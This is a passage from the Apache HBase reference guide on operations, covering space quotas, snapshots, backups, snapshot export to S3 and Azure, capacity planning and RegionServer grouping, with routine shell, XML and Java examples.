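  <name>hbase.ipc.server.callqueue.handler.factor</name>
  <value>0.5</value>
</property>
<!-- Dedicate 60% of the call queues to read requests -->
<property>
  <name>hbase.ipc.server.callqueue.read.ratio</name>
  <value>0.6</value>
</property>
----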

.Get and Scan Queues
Similar to the read/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`
property to give more priority to gets or to scans. A scan ratio of `0.1` will give
more queues/handlers to the incoming gets, which means that more gets can be processed
at the same time and that fewer scans can be executed at the same time. A value of
`0.9` will give more queues/handlers to scans, so the number of scans executed will
increase and the number of gets will decrease.

[[space-quotas]]
=== Space Quotas

link:https://issues.apache.org/jira/browse/HBASE-16961[HBASE-16961] introduces a new type of
quotas for HBase to leverage: filesystem quotas. These "space" quotas limit the amount of space
on the filesystem that HBase namespaces and tables can consume. If a user, malicious or ignorant,
has the ability to write data into HBase, then, with enough time, that user can effectively crash HBase
(or worse, HDFS) by consuming all available space. When there is no filesystem space available,
HBase crashes because it can no longer create/sync data to the write-ahead log.

This feature allows a limit to be set on the size of a table or namespace. When a space quota is set
on a namespace, the quota's limit applies to the sum of usage of all tables in that namespace.
When a table with a quota exists in a namespace with a quota, the table quota takes priority
over the namespace quota. This allows for a scenario where a large limit can be placed on
a collection of tables, but a single table in that collection can have a fine-grained limit set.

The existing `set_quota` and `list_quota` HBase shell commands can be used to interact with
space quotas. Space quotas are quotas with a `TYPE` of `SPACE` and have `LIMIT` and `POLICY`
attributes. The `LIMIT` is a string that refers to the amount of space on the filesystem
that the quota subject (e.g. the table or namespace) may consume. For example, valid values
of `LIMIT` are `'10G'`, `'2T'`, or `'256M'`. The `POLICY` refers to the action that HBase will
take when the quota subject's usage exceeds the `LIMIT`. The following are valid `POLICY` values.

* `NO_INSERTS` - No new data may be written (e.g. `Put`, `Increment`, `Append`).
* `NO_WRITES` - Same as `NO_INSERTS` but `Deletes` are also disallowed.
* `NO_WRITES_COMPACTIONS` - Same as `NO_WRITES` but compactions are also disallowed.
* `DISABLE` - The table(s) are disabled, preventing all read/write access.

.Setting simple space quotas
----
# Sets a quota on the table 't1' with a limit of 1GB, disallowing Puts/Increments/Appends when the table exceeds 1GB
hbase> set_quota TYPE => SPACE, TABLE => 't1', LIMIT => '1G', POLICY => NO_INSERTS

# Sets a quota on the namespace 'ns1' with a limit of 50TB, disallowing Puts/Increments/Appends/Deletes
hbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '50T', POLICY => NO_WRITES

# Sets a quota on the table 't3' with a limit of 2TB, disallowing any writes and compactions when the table exceeds 2TB.
hbase> set_quota TYPE => SPACE, TABLE => 't3', LIMIT => '2T', POLICY => NO_WRITES_COMPACTIONS

# Sets a quota on the table 't2' with a limit of 50GB, disabling the table when it exceeds 50GB
hbase> set_quota TYPE => SPACE, TABLE => 't2', LIMIT => '50G', POLICY => DISABLE
----

Consider the following scenario to set up quotas on a namespace, overriding the quota on tables in that namespace:

.Table and Namespace space quotas
----
hbase> create_namespace 'ns1'
hbase> create 'ns1:t1'
hbase> create 'ns1:t2'
hbase> create 'ns1:t3'
hbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '100T', POLICY => NO_INSERTS
hbase> set_quota TYPE => SPACE, TABLE => 'ns1:t2', LIMIT => '200G', POLICY => NO_WRITES
hbase> set_quota TYPE => SPACE, TABLE => 'ns1:t3', LIMIT => '20T', POLICY => NO_WRITES
----

In the above scenario, the tables in the namespace `ns1` will not be allowed to consume more than
100TB of space on the filesystem among each other. The table 'ns1:t2' is only allowed to be 200GB in size, and will
disallow all writes when the usage exceeds this limit. The table 'ns1:t3' is allowed to grow to 20TB in size
and also will disallow all writes when the usage exceeds this limit. Because there is no table quota
on 'ns1:t1', this table can grow up to 100TB, but only if 'ns1:t2' and 'ns1:t3' have a usage of zero bytes.
Practically, its limit is 100TB less the current usage of 'ns1:t2' and 'ns1:t3'.

[[ops.space.quota.deletion]]
=== Disabling Automatic Space Quota Deletion

By default, if a table or namespace is deleted that has a space quota, the quota itself is
also deleted. In some cases, it may be desirable for the space quota to not be automatically deleted.
In these cases, the user may configure the system to not delete any space quota automatically via _hbase-site.xml_.

[source,xml]
----
<property>
  <name>hbase.master.quota.observer.ignore</name>
  <value>true</value>
</property>
----

=== HBase Snapshots with Space Quotas

One common area of unintended filesystem use with HBase is via HBase snapshots. Because snapshots
exist outside of the management of HBase tables, it is not uncommon for administrators to suddenly
realize that hundreds of gigabytes or terabytes of space is being used by HBase snapshots which were
forgotten and never removed.

link:https://issues.apache.org/jira/browse/HBASE-17748[HBASE-17748] is the umbrella JIRA issue which
expands on the original space quota functionality to also include HBase snapshots. While this is a confusing
subject, the implementation attempts to present this support in as reasonable and simple a manner as
possible for administrators.
This feature does not make any changes to administrator interaction with
space quotas, only in the internal computation of table/namespace usage. Table and namespace usage will
automatically incorporate the size taken by a snapshot per the rules defined below.

As a review, let's cover a snapshot's lifecycle: a snapshot is metadata which points to
a list of HFiles on the filesystem. This is why creating a snapshot is a very cheap operation; no HBase
table data is actually copied to perform a snapshot. Cloning a snapshot into a new table or restoring
a table is a cheap operation for the same reason; the new table references the files which already exist
on the filesystem without a copy. To include snapshots in space quotas, we need to define which table
"owns" a file when a snapshot references the file ("owns" refers to encompassing the filesystem usage
of that file).

Consider a snapshot which was made against a table. When the snapshot refers to a file and the table no
longer refers to that file, the "originating" table "owns" that file. When multiple snapshots refer to
the same file and no table refers to that file, the snapshot with the lowest-sorting name (lexicographically)
is chosen and the table which that snapshot was created from "owns" that file. HFiles are not "double-counted"
when a table and one or more snapshots refer to that HFile.

When a table is "rematerialized" (via `clone_snapshot` or `restore_snapshot`), a similar problem of file
ownership arises. In this case, while the rematerialized table references a file which a snapshot also
references, the table does not "own" the file. The table from which the snapshot was created still "owns"
that file. When the rematerialized table is compacted or the snapshot is deleted, the rematerialized table
will uniquely refer to a new file and "own" the usage of that file.
Similarly, when a table is duplicated via a snapshot
and `restore_snapshot`, the new table will not consume any quota size until the original table stops referring
to the files, either due to a compaction on the original table, a compaction on the new table, or the
original table being deleted.

One new HBase shell command was added to inspect the computed sizes of each snapshot in an HBase instance.

----
hbase> list_snapshot_sizes
SNAPSHOT SIZE
 t1.s1 1159108
----

[[ops.backup]]
== HBase Backup

There are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.
Each approach has pros and cons.

For additional information, see link:http://blog.sematext.com/2011/03/11/hbase-backup-options/[HBase Backup
 Options] over on the Sematext Blog.

[[ops.backup.fullshutdown]]
=== Full Shutdown Backup

Some environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used as a back-end analytic capacity and not for serving front-end web pages.
The benefit is that the NameNode, Master, and RegionServers are down, so there is no chance of missing any in-flight changes to either StoreFiles or metadata.
The obvious con is that the cluster is down.
The steps include:

[[ops.backup.fullshutdown.stop]]
==== Stop HBase



[[ops.backup.fullshutdown.distcp]]
==== Distcp

Distcp could be used to copy the contents of the HBase directory in HDFS either to the same cluster in another directory, or to a different cluster.

Note: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.
Distcp-ing of files in the HBase directory is not generally recommended on a live cluster.
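
For example, with the cluster down, a backup might look like the following sketch; the paths and namenode addresses are placeholders:

[source,bourne]
----
# Copy the HBase directory to a backup directory on the same cluster
$ hadoop distcp /hbase /backup/hbase-20180101

# Or copy it to a different cluster
$ hadoop distcp hdfs://srv1:8020/hbase hdfs://backup-cluster:8020/hbase-backup
----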

[[ops.backup.fullshutdown.restore]]
==== Restore (if needed)

The backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.
The act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part), not the entire HDFS file-system.

[[ops.backup.live.replication]]
=== Live Cluster Backup - Replication

This approach assumes that there is a second cluster.
See the HBase page on link:https://hbase.apache.org/book.html#_cluster_replication[replication] for more information.

[[ops.backup.live.copytable]]
=== Live Cluster Backup - CopyTable

The <<copy.table,copytable>> utility could either be used to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.

Since the cluster is up, there is a risk that edits could be missed in the copy process.

[[ops.backup.live.export]]
=== Live Cluster Backup - Export

The <<export,export>> approach dumps the content of a table to HDFS on the same cluster.
To restore the data, the <<import,import>> utility would be used.

Since the cluster is up, there is a risk that edits could be missed in the export process.

[[ops.snapshots]]
== HBase Snapshots

HBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.
Snapshot, clone, and restore operations don't involve data copying.
Also, exporting a snapshot to another cluster has no impact on the Region Servers.

Prior to version 0.94.6, the only way to back up or clone a table was to use CopyTable/ExportTable, or to copy all the hfiles in HDFS after disabling the table.
The disadvantages of these methods are that you can degrade region server performance (Copy/Export Table), or you need to disable the table, which means no reads or writes; this is usually unacceptable.

[[ops.snapshots.configuration]]
=== Configuration

To turn on snapshot support, just set the `hbase.snapshot.enabled` property to true.
(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+.)

[source,xml]
----
<property>
  <name>hbase.snapshot.enabled</name>
  <value>true</value>
</property>
----

[[ops.snapshots.takeasnapshot]]
=== Take a Snapshot

You can take a snapshot of a table regardless of whether it is enabled or disabled.
The snapshot operation doesn't involve any data copying.

----
$ ./bin/hbase shell
hbase> snapshot 'myTable', 'myTableSnapshot-122112'
----

.Take a Snapshot Without Flushing
The default behavior is to perform a flush of data in memory before the snapshot is taken.
This means that data in memory is included in the snapshot.
In most cases, this is the desired behavior.
However, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable flushing while taking the snapshot.

----
hbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}
----

WARNING: There is no way to determine or predict whether a concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.
A snapshot is only a representation of a table during a window of time.
The amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.
There is also no way to know whether a given insert or update is in memory or has been flushed.

[[ops.snapshots.list]]
=== Listing Snapshots

List all snapshots taken (by printing the names and relevant information).

----
$ ./bin/hbase shell
hbase> list_snapshots
----

[[ops.snapshots.delete]]
=== Deleting Snapshots

You can remove a snapshot, and the files retained for that snapshot will be removed if they are no longer needed.

----
$ ./bin/hbase shell
hbase> delete_snapshot 'myTableSnapshot-122112'
----

[[ops.snapshots.clone]]
=== Clone a table from snapshot

From a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.
The clone operation doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.

----
$ ./bin/hbase shell
hbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'
----

[[ops.snapshots.restore]]
=== Restore a snapshot

The restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.

----
$ ./bin/hbase shell
hbase> disable 'myTable'
hbase> restore_snapshot 'myTableSnapshot-122112'
----

NOTE: Since replication works at the log level and snapshots at the file-system level, after a restore, the replicas will be in a different state from the master.
If you want to use restore, you need to stop replication and redo the bootstrap.

In case of partial data-loss due to a misbehaving client, instead of a full restore that requires the table to be disabled,
you can clone the table from the snapshot and use a Map-Reduce job to copy the data that you need from the clone to the main table.

[[ops.snapshots.acls]]
=== Snapshots operations and ACLs

If you are using security with the AccessController Coprocessor (see <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.
This means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.

[[ops.snapshots.export]]
=== Export to another cluster

The ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.
The tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at the file-system level the HBase cluster does not have to be online.

To copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs://srv2:8082/hbase) using 16 mappers:

[source,bourne]
----
$ bin/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs://srv2:8082/hbase -mappers 16
----

.Limiting Bandwidth Consumption
You can limit the bandwidth consumption when exporting a snapshot, by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.
The following example limits the above example to 200 MB/sec.

[source,bourne]
----
$ bin/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs://srv2:8082/hbase -mappers 16 -bandwidth 200
----

[[snapshots_s3]]
=== Storing Snapshots in an Amazon S3 Bucket

You can store and retrieve snapshots from Amazon S3, using the following procedure.

NOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.

.Prerequisites
- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first
configuration that uses the Amazon AWS SDK.
- You must use the `s3a://` protocol to connect to Amazon S3.
The older `s3n://`
and `s3://` protocols have various limitations and do not use the Amazon AWS SDK.
- The `s3a://` URI must be configured and available on the server where you run
the commands to export and restore the snapshot.

After you have fulfilled the prerequisites, take the snapshot like you normally would.
Afterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`
command like the one below, substituting your own `s3a://` path in the `copy-from`
or `copy-to` directive and substituting or modifying other options as required:

----
$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \
 -snapshot MySnapshot \
 -copy-from hdfs://srv2:8082/hbase \
 -copy-to s3a://<bucket>/<namespace>/hbase \
 -chuser MyUser \
 -chgroup MyGroup \
 -chmod 700 \
 -mappers 16
----

To import the snapshot from S3 back into HDFS, reverse the `copy-from` and `copy-to` directives:

----
$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \
 -snapshot MySnapshot \
 -copy-from s3a://<bucket>/<namespace>/hbase \
 -copy-to hdfs://srv2:8082/hbase \
 -chuser MyUser \
 -chgroup MyGroup \
 -chmod 700 \
 -mappers 16
----

You can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a://` path by including the
`-remote-dir` option.

----
$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \
 -remote-dir s3a://<bucket>/<namespace>/hbase \
 -list-snapshots
----

[[snapshots_azure]]
=== Storing Snapshots in Microsoft Azure Blob Storage

You can store snapshots in Microsoft Azure Blob Storage using the same techniques
as in <<snapshots_s3>>.

.Prerequisites
- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or
 higher. No version of HBase supports Hadoop 2.7.0.
- Your hosts must be configured to be aware of the Azure blob storage filesystem.
 See https://hadoop.apache.org/docs/r2.7.1/hadoop-azure/index.html.

After you meet the prerequisites, follow the instructions
in <<snapshots_s3>>, replacing the protocol specifier with `wasb://` or `wasbs://`.

[[ops.capacity]]
== Capacity Planning and Region Sizing

There are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.
Start with a solid understanding of how HBase handles data internally.

[[ops.capacity.nodes]]
=== Node count and hardware/VM configuration

[[ops.capacity.nodes.datasize]]
==== Physical data size

Physical data size on disk is distinct from the logical size of your data and is affected by the following:

* Increased by HBase overhead
+
** See <<keyvalue,keyvalue>> and <<keysize,keysize>>.
 At least 24 bytes per key-value (cell), can be more.
 Small keys/values means more relative overhead.
** KeyValue instances are aggregated into blocks, which are indexed.
 Indexes also have to be stored.
 Blocksize is configurable on a per-ColumnFamily basis.
 See <<regions.arch,regions.arch>>.
* Decreased by <<compression,compression>> and data block encoding, depending on data.
 See also link:http://search-hadoop.com/m/lL12B1PFVhp1[this thread].
 You might want to test what compression and encoding (if any) make sense for your data.
* Increased by the size of the region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).
* Increased by HDFS replication - usually x3.

Aside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see
<<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nNumber of nodes can also be driven by required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlanning should be done for peak load if it is likely that the load would be the main driver of the increase of the node count.\nPerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test single node or a test cluster.\n\nFor write, usually 5-15Mb\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nRS cannot currently utilize very large heap due to cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24Gb or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere (TODO: where?)\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally less regions makes for a smoother running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region size given table size.\n\nWhen configuring regions for multiple tables, note that most region settings can be set on a per-table basis via link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed data.\nHDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories of the \/hbase\/<table>\/ subdirectories in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server. 
<<too_many_regions,too many regions>> has technical discussion on the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size; usually in 128-256 MB range, see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))+\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS is a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n\nThis number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to limited number of concurrent flushes). 
\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n\nThis number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nEven when all regions are written to, region memstores are not filled evenly, and jitter eventually appears (due to the limited number of concurrent flushes).\nThus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workloads, the memstore fraction can be increased in configuration at the expense of the block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16 GB of data on a 20 node cluster, your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200 MB of data into HBase and then wondering why your awesome 10 node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20 GB, and 5-10 GB is optimal.\nFor the older 0.90.x codebase, the upper bound of region size is about 4 GB, with a default of 256 MB.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nIf you cannot estimate the size of your tables well, when starting off, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually split hot regions to spread the load over the cluster), or go with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, an experimental stripe compaction feature was added that allows for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to the above numbers for region size and number of regions per region server, an optimistic estimate of 10 GB x 100 regions per RS gives up to 1 TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1 TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing a high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for 
write-intensive workloads, you may opt for less frequent compactions and more store files per region.\nThe minimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to a higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in such a case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>\n\n[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and the number of RSes, one can pre-split the table at creation time.\nThis both avoids some costly splitting as the table starts to fill up, and ensures that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes); rather, a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor a pre-splitting howto, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>; a minimal Java sketch follows below.\n
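\nAs an illustration, here is a minimal Java sketch that creates a table pre-split into ten regions via the `Admin` API; the table name, column family, and boundary keys are hypothetical, and evenly spaced split points are assumed purely for the example:\n\n[source,java]\n----\nimport java.io.IOException;\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.HColumnDescriptor;\nimport org.apache.hadoop.hbase.HTableDescriptor;\nimport org.apache.hadoop.hbase.TableName;\nimport org.apache.hadoop.hbase.client.Admin;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\nimport org.apache.hadoop.hbase.util.Bytes;\n\npublic class PresplitExample {\n  public static void main(String[] args) throws IOException {\n    Configuration conf = HBaseConfiguration.create();\n    try (Connection connection = ConnectionFactory.createConnection(conf);\n         Admin admin = connection.getAdmin()) {\n      HTableDescriptor desc = new HTableDescriptor(TableName.valueOf(\"myTable\"));\n      desc.addFamily(new HColumnDescriptor(\"cf\"));\n      \/\/ Ten regions, with split points computed evenly between the boundary keys.\n      admin.createTable(desc, Bytes.toBytes(\"0000000000\"), Bytes.toBytes(\"ffffffffff\"), 10);\n    }\n  }\n}\n----\n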
\n[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of hbase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table, replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of hbase 0.94.x, you can use the snapshot facility to rename a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, TableName oldTableName, TableName newTableName) throws IOException {\n  String snapshotName = randomName();\n  admin.disableTable(oldTableName);\n  admin.snapshot(snapshotName, oldTableName);\n  admin.cloneSnapshot(snapshotName, newTableName);\n  admin.deleteSnapshot(snapshotName);\n  admin.deleteTable(oldTableName);\n}\n----\n\n[[rsgroup]]\n== RegionServer Grouping\nRegionServer Grouping (A.K.A `rsgroup`) is an advanced feature for\npartitioning regionservers into distinctive groups for strict isolation. It\nshould only be used by users who are sophisticated enough to understand the\nfull implications and have a sufficient background in managing HBase clusters.\nIt was developed by Yahoo! and they run it at scale on their large grid cluster.\nSee link:http:\/\/www.slideshare.net\/HBaseCon\/keynote-apache-hbase-at-yahoo-scale[HBase at Yahoo! Scale].\n\nRSGroups can be defined and managed with shell commands or corresponding Java\nAPIs. A server can be added to a group with a hostname and port pair, and tables\ncan be moved to this group so that only regionservers in the same rsgroup can\nhost the regions of the table. RegionServers and tables can only belong to one\nrsgroup at a time. By default, all tables and regionservers belong to the\n`default` rsgroup. System tables can also be put into a rsgroup using the regular\nAPIs. A custom balancer implementation tracks assignments per rsgroup and makes\nsure to move regions to the relevant regionservers in that rsgroup. The rsgroup\ninformation is stored in a regular HBase table, and a zookeeper-based read-only\ncache is used at cluster bootstrap time.\n\nTo enable, add the following to your hbase-site.xml and restart your Master:\n\n[source,xml]\n----\n <property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupAdminEndpoint<\/value>\n <\/property>\n <property>\n <name>hbase.master.loadbalancer.class<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupBasedLoadBalancer<\/value>\n <\/property>\n----\n\nThen use the shell _rsgroup_ commands to create and manipulate RegionServer\ngroups: e.g. to add a rsgroup and then add a server to it. To see the list of\nrsgroup commands available in the hbase shell, type:\n\n[source, bash]\n----\n hbase(main):008:0> help 'rsgroup'\n Took 0.5610 seconds\n----\n\nAt a high level, you create a rsgroup other than the `default` group using the\n_add_rsgroup_ command. You then add servers and tables to this group with the\n_move_servers_rsgroup_ and _move_tables_rsgroup_ commands. If necessary, run\na balance for the group with the _balance_rsgroup_ command if tables are slow\nto migrate to the group's dedicated servers (usually this is not needed). To\nmonitor the effect of the commands, see the `Tables` tab toward the end of the\nMaster UI home page. If you click on a table, you can see what servers it is\ndeployed across. You should see here a reflection of the grouping done with\nyour shell commands. View the Master log if you run into issues.\n\nHere is an example using a few of the rsgroup commands. To add a group, do as follows:\n\n[source, bash]\n----\n hbase(main):008:0> add_rsgroup 'my_group'\n Took 0.5610 seconds\n----\n\n\n.RegionServer Groups must be Enabled\n[NOTE]\n====\nIf you have not enabled the rsgroup Coprocessor Endpoint in the master and\nyou run any of the rsgroup shell commands, you will see an error message\nlike the below:\n\n[source,java]\n----\nERROR: org.apache.hadoop.hbase.exceptions.UnknownProtocolException: No registered master coprocessor service found for name RSGroupAdminService\n at org.apache.hadoop.hbase.master.MasterRpcServices.execMasterService(MasterRpcServices.java:604)\n at org.apache.hadoop.hbase.shaded.protobuf.generated.MasterProtos$MasterService$2.callBlockingMethod(MasterProtos.java)\n at org.apache.hadoop.hbase.ipc.RpcServer.call(RpcServer.java:1140)\n at org.apache.hadoop.hbase.ipc.CallRunner.run(CallRunner.java:133)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:277)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:257)\n----\n====\n\nAdd a server (specified by hostname + port) to the just-made group using the\n_move_servers_rsgroup_ command as follows:\n\n[source, bash]\n----\n hbase(main):010:0> move_servers_rsgroup 'my_group',['k.att.net:51129']\n----\n
